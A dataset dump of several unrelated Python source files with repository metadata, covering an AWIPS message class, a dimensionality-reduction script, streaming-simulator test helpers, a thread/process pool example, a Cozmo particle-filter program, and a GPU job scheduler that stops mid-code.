| permissive | Unidata/awips2 | 9aee5b7ec42c2c0a2fa4d877cb7e0b399db74acb | d76c9f96e6bb06f7239c563203f226e6a6fffeef | refs/heads/unidata_18.2.1 | 2023-08-18T13:00:15.110785 | 2023-08-09T06:06:06 | 2023-08-09T06:06:06 | 19,332,079 | 161 | 75 | NOASSERTION | 2023-09-13T19:06:40 | 2014-05-01T00:59:04 | Java | UTF-8 | Python | false | false | 1,268 | py | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# File auto-generated against equivalent DynamicSerialize Java class
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# Sep 05, 2014 bclement Generated
class SubscriptionRequest(object):
def __init__(self):
self.message = None
def getMessage(self):
return self.message
def setMessage(self, message):
self.message = message
| [
"[email protected]"
]
| |
d485028798e1c737f0af507daf3b21f679ec03ae | b55c368efdfe360123be1a2e7677cee53706d1f9 | /VectorTrans/Main.py | 7f33d97819742d7ae327669e60bb979628d2c4fb | [
"MIT"
]
| permissive | ZzhiWang/DRImplicitVecXform | 207cd6ef6edf5bc90b2abb1242e2d7bb3b322f95 | 2ec0c64fb098e29ce74929f5e19bce90b2f5791c | refs/heads/master | 2023-03-17T14:51:34.755756 | 2020-08-01T09:26:35 | 2020-08-01T09:26:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,904 | py | import numpy as np
from Tools import Preprocess
from VectorTrans.DRTrans import DRTrans
from VectorTrans.MDSTrans import MDSTrans
from VectorTrans.TSNETrans import TSNETrans
from VectorTrans.PCATrans import PCATrans
from VectorTrans.MDSTransPlus import MDSTransPlus
from VectorTrans.TSNETransPlus import TSNETransPlus
from VectorTrans.CreateJson import JsonFile
def load_data():
X = np.loadtxt("..\\Data\\data.csv", dtype=np.float, delimiter=",")
label = np.loadtxt("..\\Data\\label.csv", dtype=np.int, delimiter=",")
return X, label
def run_example():
dr_method = 'MDS' # 'MDS' 't-SNE' 'PCA' 'MDSPlus' 't-SNEPlus'
X, label = load_data()
repeat = Preprocess.has_repeat(X)
if repeat:
print("Please recheck the input data for duplicate points")
return
X = Preprocess.normalize(X) # Optional
(n, d) = X.shape
trans = DRTrans()
if dr_method == 'MDS':
trans = MDSTrans(X, label=label, y_init=None, y_precomputed=False)
elif dr_method == 't-SNE':
trans = TSNETrans(X, label=label, y_init=None, perplexity=30.0)
elif dr_method == 'PCA':
trans = PCATrans(X, label=label)
elif dr_method == "MDSPlus":
trans = MDSTransPlus(X, label=label, y_init=None, y_precomputed=False)
elif dr_method == "t-SNEPlus":
trans = TSNETransPlus(X, label=label, y_init=None, perplexity=30.0)
else:
print("This method is not supported at this time: ", dr_method)
return
trans.transform(nbrs_k=20, MAX_EIGEN_COUNT=4, yita=0.1)
np.savetxt("..\\Data\\"+str(dr_method)+"_Y.csv", trans.Y, fmt='%.18e', delimiter=",")
if n*d < 1024 ** 3 / 2:
np.savetxt("..\\Data\\"+str(dr_method)+"_derivative.csv", trans.derivative, fmt='%.18e', delimiter=",")
json_file = JsonFile(path="..\\Data\\")
json_file.create_file(trans)
if __name__ == '__main__':
run_example()
| [
"[email protected]"
]
| |
b9fc0ded63c3c6f0ff7857c261a68f18076d6d8e | 9dc8c299ee7d4a225002127cc03b4253c8a721fd | /libs/unittest/live_related_condition.py | 5604fdc9fc852993f3b40a2a692f9a1c3da1f49b | []
| no_license | namesuqi/strategy_corgi | 5df5d8c89bdf7a7c465c438048be20ef16120f4f | 557b8f8eabf034c2a57c25e6bc581858dd4f1b6e | refs/heads/master | 2020-03-07T04:00:18.313901 | 2018-03-29T07:50:50 | 2018-03-29T07:50:50 | 127,253,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,149 | py | # !/usr/bin/python
# coding=utf-8
# author: JinYiFan
from config import *
from libs.module.live_seeds import *
import time
def wait_for_second(wait_time):
time.sleep(wait_time)
def change_config(live_file_count, live_peer_count, rate_of_peer_and_file):
"""
修改config文件的参数配置
:param live_file_count: 文件总数
:param live_peer_count: 播放的节点总数
:param rate_of_peer_and_file: 单个文件对应的播放节点数
"""
orm.session.query(Configs).filter(Configs.role == "live_file_count").update(
{"content": live_file_count})
orm.session.query(Configs).filter(Configs.role == "live_peer_count").update(
{"content": live_peer_count})
orm.session.query(Configs).filter(Configs.role == "rate_of_peer_and_file").update(
{"content": rate_of_peer_and_file})
orm.session.commit()
orm.session.close()
def change_peer_flow_to_0():
"""
将peer的CDN和P2P流量设为0
"""
orm.session.query(Live_Peer).update({"cdn": 0, "p2p": 0})
orm.session.commit()
orm.session.close()
def change_LF_flow_to_0():
"""
将LF的CDN和P2P流量设为0
"""
orm.session.query(Live_Seed).update({"upload": 0, "download": 0})
orm.session.commit()
orm.session.close()
def add_player(play_num):
"""
增加播放节点
:param play_num: 增加的播放节点数
"""
peer_num_infos = orm.session.query(Live_Online).offset(200).limit(play_num).all()
file_id = orm.session.query(Live_Peer).first().file_id
num = 0
for num in range(play_num):
live_peer_sdk = Live_Peer(peer_id=peer_num_infos[num].peer_id, version=peer_num_infos[num].sdk_version,
country=peer_num_infos[num].country, province_id=peer_num_infos[num].province_id,
city_id=peer_num_infos[num].city_id, isp_id=peer_num_infos[num].isp_id,
file_id=file_id, chunk_id=get_random_chunk_id(), operation=OPERATION, cdn=CDN,
p2p=P2P, ssid=peer_num_infos[num].ssid, p2penable=P2PENABLE)
orm.session.add(live_peer_sdk)
num += 1
orm.session.commit()
orm.session.close()
def one_peer_multi_channel(channel_num):
"""
一个播放节点播放多个频道
:param channel_num: 一个播放节点播放的频道数
"""
peer_info = orm.session.query(Live_Peer).first()
file_info = orm.session.query(Live_File).offset(5).limit(channel_num).all()
for num in range(channel_num - 1):
live_peer_sdk = Live_Peer(peer_id=peer_info.peer_id, version=peer_info.version, country=peer_info.country,
province_id=peer_info.province_id, city_id=peer_info.city_id, isp_id=peer_info.isp_id,
file_id=file_info[num].file_id, chunk_id=get_random_chunk_id(), operation=OPERATION,
cdn=CDN, p2p=P2P, ssid=peer_info.ssid, p2penable=P2PENABLE)
orm.session.add(live_peer_sdk)
num += 1
orm.session.commit()
orm.session.close()
def del_player(del_num):
"""
删除播放节点
:param del_num: 删除的播放节点数
"""
peer_infos = orm.session.query(Live_Peer).all()
session_ids = list()
for peer_info in peer_infos:
session_ids.append(peer_info.ssid)
num = 0
for num in range(del_num):
orm.session.query(Live_Peer).filter_by(ssid=session_ids[num]).delete()
num += 1
orm.session.commit()
orm.session.close()
def del_seed(del_num):
"""
删除雷锋节点
:param del_num: 删除的雷锋节点数
"""
seed_infos = orm.session.query(Live_Seed).all()
session_ids = list()
for seed_info in seed_infos:
session_ids.append(seed_info.ssid)
num = 0
for num in range(del_num):
orm.session.query(Live_Seed).filter_by(ssid=session_ids[num]).delete()
num += 1
orm.session.commit()
orm.session.close()
if __name__ == "__main__":
del_seed(20)
# add_player(3)
# one_peer_multi_channel(3)
# del_player(2)
| [
"[email protected]"
]
| |
b8acc579b13a7bb35130f20698e3489073b14792 | 773deb7825ff84eec3e0cf6ae8266d07251df392 | /CHAPTER05/bw41.py | c7231b7bd8d7d2ba190f52df2a0fa74e6f62a961 | []
| no_license | kji0205/py | 3ca9c2a351af05ce62d7c7c3c261ed98a7e8290d | b45ffb3424b7c0da8192d431cb7ad7933c60ef81 | refs/heads/master | 2021-01-20T18:57:51.603386 | 2016-06-23T14:24:57 | 2016-06-23T14:24:57 | 61,639,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | # 진정한 병렬성을 실현하려면 concurrent.futures를 고려하자
import logging
from pprint import pprint
from sys import stdout as STDOUT
from time import time
def gcd(pair):
a, b = pair
low = min(a, b)
for i in range(low, 0, -1):
if a % i == 0 and b % i == 0:
return i
numbers = [(1963309, 2265973), (2030677, 3814172),
(1551645, 2229620), (2039045, 2020802)]
start = time()
results = list(map(gcd, numbers))
end = time()
print('Took %.3f seconds' % (end - start))
#
from concurrent.futures import ThreadPoolExecutor
start = time()
pool = ThreadPoolExecutor(max_workers=2)
results = list(pool.map(gcd, numbers))
end = time()
print('Took %.3f seconds' % (end - start))
#
from concurrent.futures import ProcessPoolExecutor
start = time()
pool = ProcessPoolExecutor(max_workers=2)
results = list(pool.map(gcd, numbers))
end = time()
print('Took %.3f seconds' % (end - start))
| [
"[email protected]"
]
| |
b92db110450f2c14108bb1fe808f9ce2eb57621f | 2d1649a7a00d49b72ed7e53afa4abb3c9281ce03 | /.history/ParticleFilter/go_to_goal_20190422001746.py | b97cd844c688b0223ebd64a788ff07412f228001 | []
| no_license | joshzhang5/CS3630Lab6 | 9547dc6c89198e9bb4aebd8359d4feb974082d20 | 69e6df12829e18a211ae850236d74b4d728046ef | refs/heads/master | 2020-05-15T13:59:51.906195 | 2019-04-22T18:21:42 | 2019-04-22T18:21:42 | 182,317,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,111 | py | # Jiaxi Zhang
# George McAlear
try:
import matplotlib
matplotlib.use('TkAgg')
except ImportError:
pass
from skimage import color
import numpy as np
from numpy.linalg import inv
import threading
import time
import sys
import asyncio
from PIL import Image
from markers import detect, annotator
from grid import CozGrid
from gui import GUIWindow
from particle import Particle, Robot
from setting import *
from particle_filter import *
from utils import *
from time import sleep
import time
import asyncio
import cozmo
from cozmo.util import distance_mm, degrees, speed_mmps, Pose
#particle filter functionality
class ParticleFilter:
def __init__(self, grid):
self.particles = Particle.create_random(PARTICLE_COUNT, grid)
self.grid = grid
def update(self, odom, r_marker_list):
# ---------- Motion model update ----------
self.particles = motion_update(self.particles, odom)
# ---------- Sensor (markers) model update ----------
self.particles = measurement_update(self.particles, r_marker_list, self.grid)
# ---------- Show current state ----------
# Try to find current best estimate for display
m_x, m_y, m_h, m_confident = compute_mean_pose(self.particles)
return (m_x, m_y, m_h, m_confident)
class CozmoWarehouseWorker:
def __init__(self, robot: cozmo.robot.Robot):
self.current_arena_pose = None
self.current_robot_pose = robot.pose
self.robot = robot
# start streaming
robot.camera.image_stream_enabled = True
robot.camera.color_image_enabled = False
robot.camera.enable_auto_exposure()
# Obtain the camera intrinsics matrix
fx, fy = robot.camera.config.focal_length.x_y
cx, cy = robot.camera.config.center.x_y
self.camera_settings = np.array([
[fx, 0, cx],
[ 0, fy, cy],
[ 0, 0, 1]
], dtype=np.float)
self.pick_up_pose = Pose(x=4.5, y=12.75, z=0, angle_z=degrees(90))
self.drop_off_pose = Pose(x=21.75, y=12.75, z=0, angle_z=degrees(90))
self.drop_off_directions = [Pose(x=3, y=4.5, z=0, angle_z=degrees(0)), Pose(x=21.75, y=4.5, z=0, angle_z=degrees(90)), self.drop_off_pose]
self.pick_up_directions = [Pose(x=21.75, y=4.5, z=0, angle_z=degrees(90)), Pose(x=3, y=4.5, z=0, angle_z=degrees(0)), self.pick_up_pose]
self.drive_speed = speed_mmps(50)
self.grid = CozGrid("map_arena.json")
self.pf = ParticleFilter(self.grid)
threading.Thread(target=self.runGUI).start()
def runGUI(self):
self.gui = GUIWindow(self.grid, show_camera=True)
self.gui.show_particles(self.pf.particles)
self.gui.show_mean(0, 0, 0)
self.gui.start()
async def drive_to(self, directions):
print("-" * 20 + "DRIVING" + "-" * 20)
if isinstance(directions, (list,)):
for pose in directions:
await self.__drive_to_pose(pose)
else:
await self.__drive_to_pose(directions)
async def __drive_to_pose(self, pose):
print("We are at ", self.current_arena_pose, " and we are driving to ", pose)
translation = (pose - self.current_arena_pose).position
directions = Pose(x=translation.x, y=translation.y, z=0, angle_z=pose.rotation.angle_z)
print("We will follow these directions: ", directions, "\n\n")
await self.__execute_directions(directions)
print("Directions followed!", "\n\n")
self.update_current_arena_pose()
async def __execute_directions(self, directions):
print("Current arena pose is:", self.current_arena_pose, "\n\n")
print("Current robot pose is:", self.robot.pose, "\n\n")
await self.robot.turn_in_place(angle=degrees(-self.current_arena_pose.rotation.angle_z.degrees)).wait_for_completed()
print("ROBOT is at AFTER TURNING to be parallel to X: ", self.robot.pose, "\n\n")
await self.robot.drive_straight(distance=distance_mm(directions.position.x * self.grid.scale), speed=self.drive_speed).wait_for_completed()
print("ROBOT is at AFTER DRIVING in the X direction: ", self.robot.pose, "\n\n")
await self.robot.turn_in_place(angle=degrees(90)).wait_for_completed()
print("ROBOT is at AFTER TURNING to be parallel to Y: ", self.robot.pose, "\n\n")
await self.robot.drive_straight(distance=distance_mm(directions.position.y * self.grid.scale), speed=self.drive_speed).wait_for_completed()
print("ROBOT is at AFTER DRIVING in the Y direction: ", self.robot.pose, "\n\n")
print("ROBOT is TURNING ", diff_heading_deg(directions.rotation.angle_z.degrees, 90), "degrees.", "\n\n")
await self.robot.turn_in_place(angle=degrees(diff_heading_deg(directions.rotation.angle_z.degrees, 90))).wait_for_completed()
print("ROBOT is at AFTER FINAL TURN", self.robot.pose, "\n\n")
def update_current_arena_pose(self):
print("-" * 20 + "UPDATING POSE" + "-" * 20)
coordinate_systems_diff = diff_heading_deg(self.current_robot_pose.rotation.angle_z.degrees, self.current_arena_pose.rotation.angle_z.degrees)
print("robot pose before we moved was: ", self.current_robot_pose)
print("My diff heading degree is: ")
arena_initial_pose_mm = rotate_point(self.current_robot_pose.position.x, self.current_robot_pose.position.y, coordinate_systems_diff)
arena_final_pose_mm = rotate_point(self.robot.pose.position.x, self.robot.pose.position.y, coordinate_systems_diff)
d_x = arena_final_pose_mm[0] - arena_initial_pose_mm[0]
d_y = arena_final_pose_mm[1] - arena_initial_pose_mm[1]
d_heading = self.robot.pose.rotation.angle_z - self.current_robot_pose.rotation.angle_z
difference_pose = convertPoseFromMmToInches(Pose(x=d_x, y=d_y, z=0, angle_z=d_heading))
print("We think we moved ", difference_pose, "\n\n")
self.current_arena_pose = self.current_arena_pose + difference_pose
print("Current pose is now ", self.current_arena_pose, "\n\n")
async def pick_up_cube(self, tries=5):
print("-" * 20 + "GETTING CUBE" + "-" * 20)
cube = await self.robot.world.wait_for_observed_light_cube(timeout=30)
print("Found cube: %s" % cube)
picked_up_cube = await self.robot.pickup_object(cube, num_retries=tries).wait_for_completed().obj
if (picked_up_cube == None):
print("Could not get the cube.")
await self.robot.say_text("Help me!").wait_for_completed()
asyncio.sleep(5)
else:
print("Picked up cube!")
async def set_down_cube(self):
print("-" * 20 + "SETTING DOWN CUBE" + "-" * 20)
await self.robot.set_lift_height(0.0).wait_for_completed()
await self.robot.set_head_angle(degrees(3)).wait_for_completed()
async def localize(self, turn_angle=20):
print("-" * 20 + "LOCALIZING" + "-" * 20)
# reset our location estimates
conf = False
self.current_arena_pose = Pose(0,0,0,angle_z=degrees(0))
self.pf = ParticleFilter(self.grid)
# reset lift and head
await self.robot.set_lift_height(0.0).wait_for_completed()
await self.robot.set_head_angle(degrees(3)).wait_for_completed()
while not conf:
# move a little
self.current_robot_pose = self.robot.pose
await self.robot.turn_in_place(angle=degrees(turn_angle)).wait_for_completed()
odometry = self.__compute_odometry()
detected_markers, camera_image = await self.__marker_processing()
# update, motion, and measurment with the odometry and marker data
curr_x, curr_y, curr_h, conf = self.pf.update(odometry, detected_markers)
# update gui
self.gui.show_particles(self.pf.particles)
self.gui.show_mean(curr_x, curr_y, curr_h)
self.gui.show_camera_image(camera_image)
self.gui.updated.set()
self.current_arena_pose = Pose(curr_x , curr_y, 0, angle_z=degrees(curr_h))
print("We localized to arena location ", self.current_arena_pose)
def __compute_odometry(self, cvt_inch=True):
'''
Compute the odometry given the current pose of the robot (use robot.pose)
Input:
- curr_pose: a cozmo.robot.Pose representing the robot's current location
- cvt_inch: converts the odometry into grid units
Returns:
- 3-tuple (dx, dy, dh) representing the odometry
'''
last_x, last_y, last_h = self.current_robot_pose.position.x, self.current_robot_pose.position.y, \
self.current_robot_pose.rotation.angle_z.degrees
curr_x, curr_y, curr_h = self.robot.pose.position.x, self.robot.pose.position.y, \
self.robot.pose.rotation.angle_z.degrees
dx, dy = rotate_point(curr_x-last_x, curr_y-last_y, -last_h)
if cvt_inch:
dx, dy = dx / self.grid.scale, dy / self.grid.scale
return (dx, dy, diff_heading_deg(curr_h, last_h))
async def __marker_processing(self, show_diagnostic_image=False):
'''
Obtain the visible markers from the current frame from Cozmo's camera.
Since this is an async function, it must be called using await, for example:
markers, camera_image = await marker_processing(robot, camera_settings, show_diagnostic_image=False)
Input:
- robot: cozmo.robot.Robot object
- camera_settings: 3x3 matrix representing the camera calibration settings
- show_diagnostic_image: if True, shows what the marker detector sees after processing
Returns:
- a list of detected markers, each being a 3-tuple (rx, ry, rh)
(as expected by the particle filter's measurement update)
- a PIL Image of what Cozmo's camera sees with marker annotations
'''
# Wait for the latest image from Cozmo
image_event = await self.robot.world.wait_for(cozmo.camera.EvtNewRawCameraImage, timeout=30)
# Convert the image to grayscale
image = np.array(image_event.image)
image = color.rgb2gray(image)
# Detect the markers
markers, diag = detect.detect_markers(image, self.camera_settings, include_diagnostics=True)
# Measured marker list for the particle filter, scaled by the grid scale
marker_list = [marker['xyh'] for marker in markers]
marker_list = [(x/self.grid.scale, y/self.grid.scale, h) for x,y,h in marker_list]
# Annotate the camera image with the markers
if not show_diagnostic_image:
annotated_image = image_event.image.resize((image.shape[1] * 2, image.shape[0] * 2))
annotator.annotate_markers(annotated_image, markers, scale=2)
else:
diag_image = color.gray2rgb(diag['filtered_image'])
diag_image = Image.fromarray(np.uint8(diag_image * 255)).resize((image.shape[1] * 2, image.shape[0] * 2))
annotator.annotate_markers(diag_image, markers, scale=2)
annotated_image = diag_image
return marker_list, annotated_image
async def run(robot: cozmo.robot.Robot):
cosimo = CozmoWarehouseWorker(robot)
await cosimo.localize()
await cosimo.drive_to(cosimo.pick_up_pose)
while True:
await cosimo.pick_up_cube(tries=5)
await cosimo.drive_to(cosimo.drop_off_directions)
await cosimo.set_down_cube()
await cosimo.drive_to(cosimo.pick_up_directions)
class CozmoThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self, daemon=False)
def run(self):
cozmo.robot.Robot.drive_off_charger_on_connect = False # Cozmo can stay on his charger
cozmo.run_program(run, use_viewer=False)
if __name__ == '__main__':
# cozmo thread
cozmo_thread = CozmoThread()
cozmo_thread.start()
| [
"[email protected]"
]
| |
4c7ea5619cc66f92ba1b9905cdc2da6911ed9e1f | b2d3bd39b2de8bcc3b0f05f4800c2fabf83d3c6a | /examples/pwr_run/checkpointing/throughput/final3/main.py | 7a486cdf102a8565fccfdac8cf8ebbcbaf5f011c | [
"MIT"
]
| permissive | boringlee24/keras_old | 3bf7e3ef455dd4262e41248f13c04c071039270e | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | refs/heads/master | 2021-11-21T03:03:13.656700 | 2021-11-11T21:57:54 | 2021-11-11T21:57:54 | 198,494,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,723 | py | import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
with open('k80_time.json', 'r') as fp:
k80_time = json.load(fp)
with open('data/pwr.json', 'r') as fp:
pwr_dict = json.load(fp)
with open('data/util.json', 'r') as fp:
util_dict = json.load(fp)
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
V100_epoch_time = {}
for item in queue:
V100_epoch_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
promote_start_time = {}
for item in queue:
promote_start_time[str(item)] = 0
demote_list = []
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
index = 0
all_jobs_started = False
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1024'
host_node = 'c0168'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('x_data.json') as f:
x_train = json.load(f)
with open('y_data.json') as f:
y_train = json.load(f)
model = neighbors.KNeighborsRegressor(n_neighbors = 1, weights='distance')
model.fit(x_train, y_train)
####################################################################
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always force demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = demote_list
#if 'idle' in V100_qual:
# V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if num_promote <= V100_vacant: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
V100_avail = V100_vacant + len(V100_qual)
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(demote_list).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.1:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
# situations below won't happen
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError('Bug, demotion shouldnt happen because no practical complete')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
def min_speedup_demotion(K80_job, demote_list):
num_demote = len(demote_list)
global speedup_dict
# selectively demote among active K80 jobs and demote list jobs
K80_qual = list(set(list(K80_job.values())))
if 'idle' in K80_qual:
K80_qual.remove('idle')
K80_pool = list(set(K80_qual).union(demote_list))
if len(K80_pool) <= 8: # demote all jobs, no promotion
return [], demote_list[:] # must return a copy, otherwise the output points to the same address as input
else: # promote the top 4 jobs
pool_dict = {}
for job in K80_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:8] # 8 least speedup jobs
demotion_list = list(set(demote_list).intersection(sorted_pool))
promotion_list = list(set(list(K80_job.values())).difference(sorted_pool))
if 'idle' in promotion_list:
promotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.1:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicate too frequently
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global V100_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
V100_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global V100_epoch_time
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_epoch_time[job] = wall_time[1] - wall_time[0]
V100_time_step2 = V100_epoch_time[job]
K80_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
